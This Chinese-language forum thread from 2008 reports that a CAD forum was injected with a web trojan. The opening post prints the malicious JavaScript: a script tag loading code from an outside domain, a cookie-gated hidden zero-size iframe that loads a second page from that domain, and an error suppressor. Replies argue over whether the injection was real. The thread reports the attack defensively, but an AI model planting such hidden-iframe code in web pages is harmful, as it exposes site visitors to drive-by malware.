QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

展开

通知     

查看: 2122|回复: 16
收起左侧

此网被挂马

[复制链接]
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>
    / A% e' m& U2 F6 p/ A$ u" g% E

  2. , m! e# p, X9 W4 C* h/ p5 J
  3. document.writeln("<script>";
    9 `7 @$ i3 E* d+ W$ x. S
  4. document.writeln("function oK_Begin(){";. y3 V/ f$ ?3 c; q, F
  5. document.writeln("var Then = new Date() ";( G% R+ Q- E0 H, D% X' h6 v2 i6 Z( X8 f
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";# O' s; l/ P0 S. O; O- `0 T
  7. document.writeln("var cookieString = new String(document.cookie)";& \, L: \0 J# z+ z/ R8 W4 ~4 n, D
  8. document.writeln("var cookieHeader = "Cookie1=" ";- w, X0 m3 s' s1 {/ \6 X; j. w
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";; V' G. a# u. Q4 V
  10. document.writeln("if (beginPosition != -1){ ";
    $ }3 f* _6 Z' f' |
  11. document.writeln("} else ";
    $ y( H( o- a$ b% K; L
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";5 I6 n! Q6 ?; c" w4 Q5 E
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";2 Z2 V# J# r! \" e5 v
  14. document.writeln("}";
    ; t4 t. F# j! g( M. O+ O
  15. document.writeln("}";
    7 i4 k/ B2 \1 f3 o
  16. document.writeln("oK_Begin();";
    # |4 G% d' N7 p( u% J
  17. document.writeln("<\/script>";
    * t0 U/ o4 `: W$ Q
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"! _5 C- }6 V# Q. h) ^

  19. 4 Z3 X9 O1 j4 N" N" z7 i* K' j) N* s: |

  20. + S' H; Z9 ?, A; e/ o" X% V

  21. - e- p3 D/ P. q+ v$ n- _
  22. ) ~% W0 [  r3 ^. z7 S, V7 [2 ~

  23. + i  l) U3 @! X) A' F2 k" l; z4 K
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的." ?( K' n& s7 B
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.) J3 b1 F- o* t9 Z
不过,已经被清理了.4 L) ^: x' s. s3 ]
" Q7 a9 m4 L3 ]: I& F4 q
HEHE( f8 i$ o2 R" `) g2 f  ?9 `

% Y6 ?" r2 g$ u. f/ ?# b# `[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?1 l5 T0 F" Q! H/ w9 |
' n  C1 A* G2 p) m0 ?
ht tp://u.cruze3.cn/u.js
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js% R0 L& y6 H, n# I! @$ p
此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
  X0 m0 @& W! d4 K; S; M这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
- p; E& u7 u7 \3 E: sHEHE
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的.
; E8 G* R" A! {6 r, |7 f红线所指
moma.jpg
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.
) I/ B. _7 p4 Q- E1 M$ KHEHE
mlm.jpg
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:8 T, p+ u+ j1 h! l
http://www.3dportal.cn/discuz/ 之原6 N; X* V1 U3 |8 Z( _- }  I7 j
似乎看不见楼主所说的 http://u.cruze3.cn/u.js0 W9 ?, A  \5 t4 O$ i7 p7 }/ e: R

: q: t& z: r, I% D% w% p[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!0 g- ~7 S  Y( a7 Y
% X' i8 T! L% l" _4 J3 W
请清理自己计算机的缓冲区!
1.JPG
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
* q/ r2 n& v( n2 C) R; P( m, I我也说了:已修复。7 c! k  N7 A1 ~! Q* l4 N4 I, d3 x' r' z" t8 {
7 n/ B. n2 S3 U
ps:这与缓存毫无关系。虽然缓存中有U.JS.5 O3 O4 e1 V; T6 {! T
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?
7 _9 ]. |" N3 X0 p/ j) k3 y! q8 z8 S, g1 c" \2 B5 L9 o2 @0 s6 g+ U
script是个JAVA代码,与U盘何关?
) s8 O) ^6 m7 v& ~- C3 h, a8 q/ k5 @: \( j. C2 D( M$ g1 g# |; C
HEHE
# ]0 n; ?" i' Y' [- Z) O
7 A9 T1 S' G* {- @) _# I/ f) z[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!9 o% C1 h& B4 L; _9 c

. j( Q: ?4 x+ F$ \* N如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。
- V9 G  T6 v; L6 f9 a
$ b  r% ]1 [7 E3 Y; e! H9 G相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
发表回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则


Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表